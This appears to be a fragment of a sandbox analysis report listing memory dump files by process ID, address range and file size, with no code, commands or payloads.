memory/1940-0-0x00007FFC12113000-0x00007FFC12115000-memory.dmpFilesize
8KB
-
memory/1940-139-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1940-12-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1940-11-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1968-57-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2076-107-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2268-110-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2548-60-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2648-54-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2668-108-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2788-104-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2836-106-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/3052-17-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3052-30-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3052-27-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3052-26-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3144-52-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/3144-47-0x0000000000930000-0x000000000095A000-memory.dmpFilesize
168KB
-
memory/3556-61-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/4048-102-0x0000021F38E40000-0x0000021F38E58000-memory.dmpFilesize
96KB
-
memory/4360-105-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB